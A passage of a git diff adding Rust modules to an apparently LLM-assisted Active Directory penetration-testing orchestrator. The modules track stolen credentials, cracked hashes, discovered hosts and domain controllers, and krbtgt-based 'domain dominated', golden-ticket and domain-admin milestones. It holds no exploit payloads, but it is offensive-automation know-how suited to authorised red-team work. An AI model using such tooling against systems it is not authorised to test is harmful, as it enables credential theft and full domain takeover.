credentials = reader.get_credentials(&mut conn).await.unwrap_or_default(); + let hashes = reader.get_hashes(&mut conn).await.unwrap_or_default(); + let hosts = reader.get_hosts(&mut conn).await.unwrap_or_default(); + let vulns = reader + .get_vulnerabilities(&mut conn) + .await + .unwrap_or_default(); + let exploited = reader + .get_exploited_vulnerabilities(&mut conn) + .await + .unwrap_or_default(); + let meta = reader.get_meta(&mut conn).await.unwrap_or_default(); + let dc_map = reader.get_dc_map(&mut conn).await.unwrap_or_default(); + + // Load domain SIDs + let domain_sids_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAIN_SIDS + ); + let domain_sids: HashMap = + conn.hgetall(&domain_sids_key).await.unwrap_or_default(); + + // Load RID-500 admin account names + let admin_names_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ADMIN_NAMES + ); + let admin_names: HashMap = + conn.hgetall(&admin_names_key).await.unwrap_or_default(); + + // Refresh ACL chains + let acl_chains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_ACL_CHAINS + ); + let acl_chains_raw: Vec = conn + .lrange(&acl_chains_key, 0, -1) + .await + .unwrap_or_default(); + let acl_chains: Vec = acl_chains_raw + .iter() + .filter_map(|s| serde_json::from_str(s).ok()) + .collect(); + + // Refresh trusted domains + let trusted_domains_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_TRUSTED_DOMAINS + ); + let raw_trusts: HashMap = + conn.hgetall(&trusted_domains_key).await.unwrap_or_default(); + let mut trusted_domains = HashMap::new(); + for (domain, json_str) in &raw_trusts { + if let Ok(trust) = serde_json::from_str::(json_str) { + trusted_domains.insert(domain.clone(), trust); + } + } + + let mut state = self.inner.write().await; + state.credentials = credentials; + state.hashes = hashes; + state.hosts = hosts; + state.discovered_vulnerabilities = vulns; + state.exploited_vulnerabilities = exploited; + state.has_domain_admin = meta.has_domain_admin; + state.has_golden_ticket = meta.has_golden_ticket; + state.domain_admin_path = meta.domain_admin_path; + state.domain_controllers = dc_map; + state.domain_sids = domain_sids; + state.admin_names = admin_names; + state.trusted_domains = trusted_domains; + state.acl_chains = acl_chains; + // Rebuild dominated_domains from refreshed hashes + state.dominated_domains = state + .hashes + .iter() + .filter(|h| { + h.username.to_lowercase() == "krbtgt" && h.hash_type.to_lowercase().contains("ntlm") + }) + .map(|h| { + if h.domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + h.domain.to_lowercase() + } + }) + .filter(|d| !d.is_empty()) + .collect(); + + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/credentials.rs b/ares-cli/src/orchestrator/state/publishing/credentials.rs new file mode 100644 index 00000000..289b6311 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs @@ -0,0 +1,221 @@ +//! Credential and hash publishing methods. + +use anyhow::Result; + +use ares_core::models::{Credential, Hash}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +use super::sanitize_credential; + +impl SharedState { + /// Add a credential to state and Redis (with dedup). + /// + /// Sanitizes the credential before storage (strips "Password:" prefix, trailing + /// metadata, normalizes domains, rejects noise). When the credential's domain is + /// a valid FQDN (contains a dot), it is automatically added to `state.domains` + /// (matches Python's `add_credential()` behavior). + pub async fn publish_credential(&self, queue: &TaskQueue, cred: Credential) -> Result { + // Sanitize and validate before storage + let netbios_map = { + let state = self.inner.read().await; + state.netbios_to_fqdn.clone() + }; + let cred = match sanitize_credential(cred, &netbios_map) { + Some(c) => c, + None => return Ok(false), + }; + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + let mut conn = queue.connection(); + let added = reader.add_credential(&mut conn, &cred).await?; + if added { + // Auto-extract domain from credential (matches Python add_credential) + let cred_domain = cred.domain.to_lowercase(); + if cred_domain.contains('.') { + let mut state = self.inner.write().await; + if !state.domains.contains(&cred_domain) { + state.domains.push(cred_domain.clone()); + let domain_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_DOMAINS, + ); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &cred_domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + tracing::info!( + domain = %cred_domain, + username = %cred.username, + "Auto-extracted domain from credential" + ); + } + state.credentials.push(cred); + } else { + let mut state = self.inner.write().await; + state.credentials.push(cred); + } + } + Ok(added) + } + + /// Add a hash to state and Redis (with dedup). + /// + /// When a `krbtgt` NTLM hash is stored, `has_domain_admin` is automatically + /// set — mirroring Python's `add_hash()` behaviour so that `auto_golden_ticket` + /// triggers without requiring the LLM to emit a structured JSON payload. + pub async fn publish_hash(&self, queue: &TaskQueue, hash: Hash) -> Result { + use ares_core::models::VulnerabilityInfo; + use std::collections::HashMap; + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_hash(&mut conn, &hash).await?; + if added { + let is_krbtgt = hash.username.to_lowercase() == "krbtgt" + && hash.hash_type.to_lowercase().contains("ntlm"); + let hash_domain = hash.domain.clone(); + let mut state = self.inner.write().await; + state.hashes.push(hash); + + // Track per-domain domination when krbtgt NTLM hash arrives + if is_krbtgt { + let krbtgt_domain = if hash_domain.is_empty() { + state.domains.first().cloned().unwrap_or_default() + } else { + hash_domain.to_lowercase() + }; + if !krbtgt_domain.is_empty() { + state.dominated_domains.insert(krbtgt_domain.clone()); + tracing::info!(domain = %krbtgt_domain, "Domain dominated (krbtgt hash obtained)"); + } + + // Resolve DC target IP for vulnerability entry + let dc_target = state + .domain_controllers + .get(&krbtgt_domain) + .cloned() + .unwrap_or_else(|| krbtgt_domain.clone()); + + // Auto-set domain admin when first krbtgt NTLM hash arrives (matches Python) + if !state.has_domain_admin { + drop(state); + let path = Some("secretsdump → krbtgt NTLM hash".to_string()); + if let Err(e) = self.set_domain_admin(queue, path).await { + tracing::warn!(err = %e, "Failed to auto-set domain admin from krbtgt hash"); + } else { + tracing::info!( + "🎯 Domain Admin auto-set from krbtgt NTLM hash in publish_hash" + ); + } + } else { + drop(state); + } + + // Synthesize a dc_secretsdump vulnerability so the discovered + // vulnerabilities list reflects the DA achievement path. + let vuln_id = format!("dc_secretsdump_{}", krbtgt_domain); + let mut details = HashMap::new(); + details.insert( + "domain".into(), + serde_json::Value::String(krbtgt_domain.clone()), + ); + details.insert( + "note".into(), + serde_json::Value::String( + "Domain controller compromised via secretsdump — krbtgt NTLM hash extracted" + .to_string(), + ), + ); + let vuln = VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "dc_secretsdump".to_string(), + target: dc_target, + discovered_by: "credential_access".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = self.publish_vulnerability(queue, vuln).await; + let _ = self.mark_exploited(queue, &vuln_id).await; + } + } + Ok(added) + } + + /// Update a hash's `cracked_password` field in memory and Redis. + /// + /// Finds the first hash matching the given username and domain (case-insensitive) + /// that has no cracked password yet, sets it, and persists the change to the Redis + /// HASH by scanning fields and updating the matching entry. + pub async fn update_hash_cracked_password( + &self, + queue: &TaskQueue, + username: &str, + domain: &str, + password: &str, + ) -> Result { + // Update in-memory state and capture the updated hash for Redis persist + let (op_id, hash_type) = { + let mut state = self.inner.write().await; + let idx = state.hashes.iter().position(|h| { + h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && h.cracked_password.is_none() + }); + match idx { + Some(i) => { + state.hashes[i].cracked_password = Some(password.to_string()); + let ht = state.hashes[i].hash_type.clone(); + (state.operation_id.clone(), ht) + } + None => return Ok(false), + } + }; + + // Persist to Redis HASH: scan fields, find the matching entry, update it + let hash_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HASHES,); + let mut conn = queue.connection(); + let entries: std::collections::HashMap = + redis::AsyncCommands::hgetall(&mut conn, &hash_key) + .await + .unwrap_or_default(); + for (field, value) in &entries { + if let Ok(mut h) = serde_json::from_str::(value) { + if h.username.eq_ignore_ascii_case(username) + && h.domain.eq_ignore_ascii_case(domain) + && h.cracked_password.is_none() + { + h.cracked_password = Some(password.to_string()); + let updated_json = serde_json::to_string(&h).unwrap_or_default(); + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &hash_key, field, &updated_json) + .await; + break; + } + } + } + + tracing::info!( + username = %username, + domain = %domain, + hash_type = %hash_type, + "Hash cracked_password updated in state and Redis" + ); + + Ok(true) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/entities.rs b/ares-cli/src/orchestrator/state/publishing/entities.rs new file mode 100644 index 00000000..e165026b --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/entities.rs @@ -0,0 +1,252 @@ +//! Entity publishing: users, vulnerabilities, shares, timeline, tasks, netbios, trusts. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::models::{Share, User, VulnerabilityInfo}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::{SharedState, KEY_VULN_QUEUE}; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Add a user to state and Redis (with dedup). + pub async fn publish_user(&self, queue: &TaskQueue, user: User) -> Result { + // Check for duplicate in memory + { + let state = self.inner.read().await; + let dedup = format!( + "{}@{}", + user.username.to_lowercase(), + user.domain.to_lowercase() + ); + if state.users.iter().any(|u| { + format!("{}@{}", u.username.to_lowercase(), u.domain.to_lowercase()) == dedup + }) { + return Ok(false); + } + } + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_user(&mut conn, &user).await?; + if added { + let mut state = self.inner.write().await; + state.users.push(user); + } + Ok(added) + } + + /// Add a vulnerability to state and Redis. + pub async fn publish_vulnerability( + &self, + queue: &TaskQueue, + vuln: VulnerabilityInfo, + ) -> Result { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id.clone()); + let mut conn = queue.connection(); + let added = reader.add_vulnerability(&mut conn, &vuln).await?; + if added { + // Also add to vuln queue ZSET for exploitation workflow + let vuln_queue_key = + format!("{}:{}:{}", state::KEY_PREFIX, operation_id, KEY_VULN_QUEUE); + let vuln_json = serde_json::to_string(&vuln).unwrap_or_default(); + let score = vuln.priority as f64; + let _: () = conn + .zadd(&vuln_queue_key, &vuln_json, score) + .await + .unwrap_or(()); + let _: () = conn.expire(&vuln_queue_key, 86400).await.unwrap_or(()); + + let mut state = self.inner.write().await; + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + Ok(added) + } + + /// Add a share to state and Redis (with dedup). + pub async fn publish_share(&self, queue: &TaskQueue, share: Share) -> Result { + // Check for duplicate in memory + { + let state = self.inner.read().await; + if state.shares.iter().any(|s| { + s.host.to_lowercase() == share.host.to_lowercase() + && s.name.to_lowercase() == share.name.to_lowercase() + }) { + return Ok(false); + } + } + + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_share(&mut conn, &share).await?; + if added { + let mut state = self.inner.write().await; + state.shares.push(share); + } + Ok(added) + } + + /// Persist a timeline event to Redis and add MITRE techniques. + pub async fn persist_timeline_event( + &self, + queue: &TaskQueue, + event: &serde_json::Value, + mitre_techniques: &[String], + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + + reader.add_timeline_event(&mut conn, event).await?; + + for technique in mitre_techniques { + let _ = reader.add_technique(&mut conn, technique).await; + } + + Ok(()) + } + + /// Record a pending task in memory and persist to Redis HASH. + /// + /// Key: `ares:op:{id}:pending_tasks` — matches Python's state_backend. + pub async fn track_pending_task( + &self, + queue: &TaskQueue, + task: ares_core::models::TaskInfo, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let task_id = task.task_id.clone(); + let json = serde_json::to_string(&task).unwrap_or_default(); + + // Persist to Redis + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS, + ); + let mut conn = queue.connection(); + let _: Result<(), _> = redis::AsyncCommands::hset(&mut conn, &key, &task_id, &json).await; + let _: Result<(), _> = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await; + + // Update in-memory state + let mut state = self.inner.write().await; + state.pending_tasks.insert(task_id, task); + Ok(()) + } + + /// Move a task from pending to completed, persisting both changes to Redis. + /// + /// Keys: `ares:op:{id}:pending_tasks`, `ares:op:{id}:completed_tasks` + pub async fn complete_task( + &self, + queue: &TaskQueue, + task_id: &str, + result: ares_core::models::TaskResult, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let result_json = serde_json::to_string(&result).unwrap_or_default(); + + let pending_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_PENDING_TASKS, + ); + let completed_key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_COMPLETED_TASKS, + ); + + let mut conn = queue.connection(); + // Remove from pending, add to completed + let _: Result<(), _> = redis::AsyncCommands::hdel(&mut conn, &pending_key, task_id).await; + let _: Result<(), _> = + redis::AsyncCommands::hset(&mut conn, &completed_key, task_id, &result_json).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &completed_key, 86400i64).await; + + // Update in-memory state + let mut state = self.inner.write().await; + state.pending_tasks.remove(task_id); + state.completed_tasks.insert(task_id.to_string(), result); + Ok(()) + } + + /// Persist a NetBIOS to FQDN mapping to Redis HASH. + /// + /// Key: `ares:op:{id}:netbios_map` — matches Python's `HSET` on netbios_map. + pub async fn publish_netbios( + &self, + queue: &TaskQueue, + netbios: &str, + fqdn: &str, + ) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let key = format!( + "{}:{}:{}", + state::KEY_PREFIX, + operation_id, + state::KEY_NETBIOS_MAP, + ); + let mut conn = queue.connection(); + let _: () = redis::AsyncCommands::hset(&mut conn, &key, netbios, fqdn).await?; + let _: () = redis::AsyncCommands::expire(&mut conn, &key, 86400i64).await?; + + let mut state = self.inner.write().await; + state + .netbios_to_fqdn + .insert(netbios.to_string(), fqdn.to_string()); + Ok(()) + } + + /// Add a trust relationship to state and Redis. + pub async fn publish_trust_info( + &self, + queue: &TaskQueue, + trust: ares_core::models::TrustInfo, + ) -> Result { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + let added = reader.add_trusted_domain(&mut conn, &trust).await?; + if added { + let domain_key = trust.domain.to_lowercase(); + let mut state = self.inner.write().await; + state.trusted_domains.insert(domain_key, trust); + } + Ok(added) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/hosts.rs b/ares-cli/src/orchestrator/state/publishing/hosts.rs new file mode 100644 index 00000000..34c908b9 --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/hosts.rs @@ -0,0 +1,342 @@ +//! Host and domain controller publishing methods. + +use anyhow::Result; +use redis::AsyncCommands; + +use ares_core::models::Host; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +use super::is_aws_hostname; + +impl SharedState { + /// Add a host to state and Redis. + /// + /// Merges data when a host with the same IP already exists: upgrades DC + /// status, fills in hostname, and keeps the richer service list. + /// AWS internal hostnames (e.g. `ip-10-1-2-150.us-west-2.compute.internal`) + /// are stripped to allow real AD FQDNs to take precedence. + /// + /// When the hostname is a valid AD FQDN (e.g. `dc01.contoso.local`), the + /// domain suffix is automatically extracted and added to `state.domains` + /// (matches Python's `add_host()` behavior). + pub async fn publish_host(&self, queue: &TaskQueue, host: Host) -> Result { + // Normalize hostname: strip trailing dots and AWS internal names + let mut host = host; + host.hostname = host.hostname.trim_end_matches('.').to_lowercase(); + if is_aws_hostname(&host.hostname) { + host.hostname = String::new(); + } + + // Auto-extract domain from FQDN hostname (matches Python add_host) + // e.g. "dc02.child.contoso.local" → "child.contoso.local" + if !host.hostname.is_empty() + && host.hostname.contains('.') + && !is_aws_hostname(&host.hostname) + { + let hostname_clean = host.hostname.trim_end_matches('.'); + let parts: Vec<&str> = hostname_clean.split('.').collect(); + if parts.len() >= 3 { + let domain = parts[1..].join(".").to_lowercase(); + // Reject AWS/cloud domains + if !domain.contains("compute.internal") && !domain.contains("amazonaws.com") { + let op_id = self.inner.read().await.operation_id.clone(); + let mut state = self.inner.write().await; + if !state.domains.contains(&domain) { + state.domains.push(domain.clone()); + let domain_key = + format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS,); + let mut conn = queue.connection(); + let _: Result<(), _> = + redis::AsyncCommands::sadd(&mut conn, &domain_key, &domain).await; + let _: Result<(), _> = + redis::AsyncCommands::expire(&mut conn, &domain_key, 86400i64).await; + tracing::info!( + hostname = %host.hostname, + domain = %domain, + "Auto-extracted domain from host FQDN" + ); + } + } + + // Auto-populate netbios_to_fqdn map so CLI can resolve short names. + // e.g. "dc02.child.contoso.local" → DC02 → dc02.child.contoso.local + let short_name = parts[0].to_uppercase(); + let fqdn = host.hostname.to_lowercase(); + let _ = self.publish_netbios(queue, &short_name, &fqdn).await; + } + } + + // Check for existing host with same IP or hostname and merge if the + // new entry brings richer data (DC detection, more services, hostname). + // Returns (needs_dc_registration, was_merged_and_changed). + let (needs_dc_registration, merged_changed) = { + let mut state = self.inner.write().await; + // Look up by IP first, then fall back to hostname match + let existing_idx = state + .hosts + .iter() + .position(|h| !h.ip.is_empty() && h.ip == host.ip) + .or_else(|| { + if !host.hostname.is_empty() { + state.hosts.iter().position(|h| { + !h.hostname.is_empty() + && h.hostname.eq_ignore_ascii_case(&host.hostname) + }) + } else { + None + } + }); + if let Some(existing) = existing_idx.map(|i| &mut state.hosts[i]) { + // Merge IP if incoming has one and existing doesn't + if !host.ip.is_empty() && existing.ip.is_empty() { + existing.ip = host.ip.clone(); + } + let new_is_dc = host.is_dc || host.detect_dc(); + let was_dc = existing.is_dc; + let had_hostname = !existing.hostname.is_empty(); + let mut changed = false; + + if new_is_dc && !existing.is_dc { + existing.is_dc = true; + changed = true; + } + // Strip AWS hostname from existing entry too + if is_aws_hostname(&existing.hostname) { + existing.hostname = String::new(); + changed = true; + } + if !host.hostname.is_empty() && existing.hostname.is_empty() { + existing.hostname = host.hostname.clone(); + changed = true; + } + for svc in &host.services { + if !existing.services.contains(svc) { + existing.services.push(svc.clone()); + changed = true; + } + } + if !host.os.is_empty() && existing.os.is_empty() { + existing.os = host.os.clone(); + changed = true; + } + if !host.roles.is_empty() && existing.roles.is_empty() { + existing.roles = host.roles.clone(); + changed = true; + } + + if !changed { + return Ok(false); + } + + // Re-register DC if it just became a DC, or if its hostname + // was just filled in (so we can correct the domain mapping). + let is_dc_now = existing.is_dc; + let has_hostname_now = !existing.hostname.is_empty(); + let needs_dc = + (is_dc_now && !was_dc) || (is_dc_now && has_hostname_now && !had_hostname); + (needs_dc, true) + } else { + // No existing host — will be added below + (false, false) + } + }; + + // Register netbios mapping for merged host if hostname was updated + if merged_changed { + let state = self.inner.read().await; + if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { + if merged.hostname.contains('.') { + let parts: Vec<&str> = merged.hostname.split('.').collect(); + if parts.len() >= 3 { + let short = parts[0].to_uppercase(); + let fqdn = merged.hostname.to_lowercase(); + drop(state); + let _ = self.publish_netbios(queue, &short, &fqdn).await; + } + } + } + } + + // Persist merged host to Redis LIST (find-by-IP and LSET). + if merged_changed { + let state = self.inner.read().await; + if let Some(merged) = state.hosts.iter().find(|h| h.ip == host.ip) { + let op_id = &state.operation_id; + let host_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_HOSTS,); + let merged_json = serde_json::to_string(merged).unwrap_or_default(); + let mut conn = queue.connection(); + // Scan the Redis LIST to find the index matching this IP + let entries: Vec = + redis::AsyncCommands::lrange(&mut conn, &host_key, 0, -1) + .await + .unwrap_or_default(); + for (idx, entry) in entries.iter().enumerate() { + if let Ok(h) = serde_json::from_str::(entry) { + if h.ip == host.ip { + let _: Result<(), _> = redis::AsyncCommands::lset( + &mut conn, + &host_key, + idx as isize, + &merged_json, + ) + .await; + break; + } + } + } + } + } + + // If we merged into an existing host and it became/updated as DC, register it + if needs_dc_registration { + let host_snapshot = { + let state = self.inner.read().await; + state + .hosts + .iter() + .find(|h| h.ip == host.ip) + .cloned() + .unwrap() + }; + self.register_dc(queue, &host_snapshot).await?; + return Ok(true); + } + + // If the host already existed (was merged), we're done + { + let state = self.inner.read().await; + if state.hosts.iter().any(|h| h.ip == host.ip) { + return Ok(true); + } + } + + // New host — add to Redis and state + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader.add_host(&mut conn, &host).await?; + + // Update DC map and domain list if this is a domain controller + if host.is_dc || host.detect_dc() { + self.register_dc(queue, &host).await?; + let mut state = self.inner.write().await; + state.hosts.push(host); + return Ok(true); + } + + let mut state = self.inner.write().await; + state.hosts.push(host); + Ok(true) + } + + /// Register a host as a domain controller: update DC map and domain list. + /// + /// Domain is derived from the FQDN hostname (e.g. `dc01.contoso.local` → `contoso.local`). + /// If the hostname is empty or not a valid AD FQDN, we fall back to the first domain + /// already in state (from the target_domain config). This ensures DCs discovered by + /// recon are registered even before their FQDN is known. + pub(crate) async fn register_dc(&self, queue: &TaskQueue, host: &Host) -> Result<()> { + // Extract domain from hostname — prefer a real FQDN + let raw_domain = if !host.hostname.is_empty() { + host.hostname + .split('.') + .skip(1) + .collect::>() + .join(".") + } else { + String::new() + }; + + // If we can't derive a domain from the hostname, fall back to the + // target domain already in state. This unblocks automation for DCs + // discovered before their FQDN is resolved. + let raw_domain = if raw_domain.is_empty() + || raw_domain.contains("compute.internal") + || raw_domain.contains("amazonaws.com") + { + let state = self.inner.read().await; + if let Some(fallback) = state.domains.first().cloned() { + tracing::info!( + ip = %host.ip, + hostname = %host.hostname, + fallback_domain = %fallback, + "DC registration: using fallback domain (no FQDN available)" + ); + fallback + } else { + tracing::debug!( + ip = %host.ip, + hostname = %host.hostname, + "Skipping DC registration: no FQDN and no fallback domain in state" + ); + return Ok(()); + } + } else { + raw_domain + }; + + let domain = raw_domain; + let domain_lower = domain.to_lowercase(); + + let mut conn = queue.connection(); + let op_id = self.inner.read().await.operation_id.clone(); + let dc_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DC_MAP); + + // Remove any stale mapping that pointed this IP to a different domain + { + let state = self.inner.read().await; + let stale_domains: Vec = state + .domain_controllers + .iter() + .filter(|(d, ip)| *ip == &host.ip && **d != domain_lower) + .map(|(d, _)| d.clone()) + .collect(); + for stale in &stale_domains { + tracing::info!( + ip = %host.ip, + old_domain = %stale, + new_domain = %domain_lower, + "Correcting DC domain mapping" + ); + let _: () = conn.hdel(&dc_key, stale).await?; + } + // Remove stale entries from state (done below under write lock) + } + + let _: () = conn.hset(&dc_key, &domain_lower, &host.ip).await?; + + // Add domain to state and Redis, correct stale mappings + let mut state = self.inner.write().await; + + // Remove stale domain → IP mappings for this IP + state + .domain_controllers + .retain(|d, ip| !(ip == &host.ip && *d != domain_lower)); + + // Insert or update the mapping + state + .domain_controllers + .insert(domain_lower.clone(), host.ip.clone()); + + if !state.domains.contains(&domain_lower) { + state.domains.push(domain_lower.clone()); + let domain_key = format!("{}:{}:{}", state::KEY_PREFIX, op_id, state::KEY_DOMAINS); + let _: () = conn.sadd(&domain_key, &domain_lower).await?; + let _: () = conn.expire(&domain_key, 86400).await?; + } + + tracing::info!( + ip = %host.ip, + domain = %domain_lower, + "Registered domain controller" + ); + + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/milestones.rs b/ares-cli/src/orchestrator/state/publishing/milestones.rs new file mode 100644 index 00000000..33d3efce --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/milestones.rs @@ -0,0 +1,156 @@ +//! Milestone publishing: golden ticket, domain admin. + +use std::collections::HashMap; + +use anyhow::Result; + +use ares_core::models::VulnerabilityInfo; +use ares_core::state::RedisStateReader; + +use crate::orchestrator::state::SharedState; +use crate::orchestrator::task_queue::TaskQueue; + +impl SharedState { + /// Set has_golden_ticket flag and persist to Redis. + pub async fn set_golden_ticket(&self, queue: &TaskQueue, domain: &str) -> Result<()> { + { + let state = self.inner.read().await; + if state.has_golden_ticket { + return Ok(()); + } + } + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader + .set_meta_field( + &mut conn, + "has_golden_ticket", + &serde_json::Value::Bool(true), + ) + .await?; + + // Resolve DC IP for the vulnerability target + let dc_target = { + let state = self.inner.read().await; + state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned() + .unwrap_or_else(|| domain.to_string()) + }; + + let mut state = self.inner.write().await; + state.has_golden_ticket = true; + tracing::info!(domain = %domain, "🏆 Golden ticket flag set"); + drop(state); + + // Synthesize a golden_ticket vulnerability so loot reflects the achievement + let vuln_id = format!("golden_ticket_{}", domain.to_lowercase()); + let mut details = HashMap::new(); + details.insert( + "domain".into(), + serde_json::Value::String(domain.to_string()), + ); + details.insert( + "note".into(), + serde_json::Value::String( + "Golden ticket forged — persistent domain access via krbtgt key".to_string(), + ), + ); + let vuln = VulnerabilityInfo { + vuln_id: vuln_id.clone(), + vuln_type: "golden_ticket".to_string(), + target: dc_target, + discovered_by: "golden_ticket_automation".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 1, + }; + let _ = self.publish_vulnerability(queue, vuln).await; + let _ = self.mark_exploited(queue, &vuln_id).await; + Ok(()) + } + + /// Set has_domain_admin flag and persist to Redis. + pub async fn set_domain_admin(&self, queue: &TaskQueue, path: Option) -> Result<()> { + let operation_id = { + let state = self.inner.read().await; + state.operation_id.clone() + }; + let reader = RedisStateReader::new(operation_id); + let mut conn = queue.connection(); + reader + .set_meta_field( + &mut conn, + "has_domain_admin", + &serde_json::Value::Bool(true), + ) + .await?; + if let Some(ref p) = path { + reader + .set_meta_field( + &mut conn, + "domain_admin_path", + &serde_json::Value::String(p.clone()), + ) + .await?; + } + + let mut state = self.inner.write().await; + state.has_domain_admin = true; + state.domain_admin_path = path.clone(); + + // Emit OTel span recording domain admin achievement. + // Walk parent_id chain from krbtgt hash to compute attack depth. + let (attack_path_str, depth) = { + let krbtgt = state.hashes.iter().find(|h| { + h.username.eq_ignore_ascii_case("krbtgt") + && h.hash_type.to_lowercase().contains("ntlm") + }); + let depth = match krbtgt { + Some(h) => { + // Count chain depth by walking parent_id + let mut d = 1usize; + let mut current_id = h.parent_id.clone(); + let mut seen = std::collections::HashSet::new(); + while let Some(ref pid) = current_id { + if !seen.insert(pid.clone()) { + break; + } + d += 1; + // Check credentials then hashes for the parent + if let Some(c) = state.credentials.iter().find(|c| c.id == *pid) { + current_id = c.parent_id.clone(); + } else if let Some(h2) = state.hashes.iter().find(|h2| h2.id == *pid) { + current_id = h2.parent_id.clone(); + } else { + break; + } + } + d + } + None => 0, + }; + let ap = path + .as_deref() + .filter(|s| !s.is_empty()) + .unwrap_or("domain_admin_achieved") + .to_string(); + (ap, depth) + }; + let op_id = state.operation_id.clone(); + drop(state); + + let span = + ares_core::telemetry::spans::trace_domain_admin(&attack_path_str, depth, Some(&op_id)); + let _guard = span.enter(); + tracing::info!(attack_path = %attack_path_str, depth = depth, "🏆 Domain admin achieved"); + + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/state/publishing/mod.rs b/ares-cli/src/orchestrator/state/publishing/mod.rs new file mode 100644 index 00000000..b205c88f --- /dev/null +++ b/ares-cli/src/orchestrator/state/publishing/mod.rs @@ -0,0 +1,118 @@ +//! Publishing methods — add credentials, hashes, hosts, and vulnerabilities +//! to both in-memory state and Redis. + +mod credentials; +mod entities; +mod hosts; +mod milestones; + +use regex::Regex; +use std::sync::LazyLock; + +/// Regex matching `Password` (case-insensitive) followed by optional `:` and space. +pub(super) static PASSWORD_PREFIX_RE: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)^password\s*:\s*").unwrap()); + +/// Regex matching trailing parenthetical metadata like ` (Guest)`, ` (Pwn3d!)`. +pub(super) static TRAILING_PAREN_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\s+\([^)]+\)\s*$").unwrap()); + +/// Sanitize and validate a credential before storage. +/// +/// Mirrors Python's `add_credential()` — strips noise from password values, +/// normalizes `user@domain@domain` usernames, resolves NetBIOS domains to FQDN, +/// and rejects invalid entries. Returns `None` if the credential should be dropped. +pub(super) fn sanitize_credential( + mut cred: ares_core::models::Credential, + netbios_to_fqdn: &std::collections::HashMap, +) -> Option { + use crate::orchestrator::output_extraction::strip_ansi; + + // Strip ANSI escape codes (tools like NetExec emit colored output) + cred.username = strip_ansi(&cred.username); + cred.password = strip_ansi(&cred.password); + cred.domain = strip_ansi(&cred.domain); + + // Trim whitespace + cred.username = cred.username.trim().to_string(); + cred.password = cred.password.trim().to_string(); + cred.domain = cred.domain.trim().to_string(); + + // Strip "Password: " / "Password:" prefix from password + if PASSWORD_PREFIX_RE.is_match(&cred.password) { + cred.password = PASSWORD_PREFIX_RE.replace(&cred.password, "").to_string(); + } + 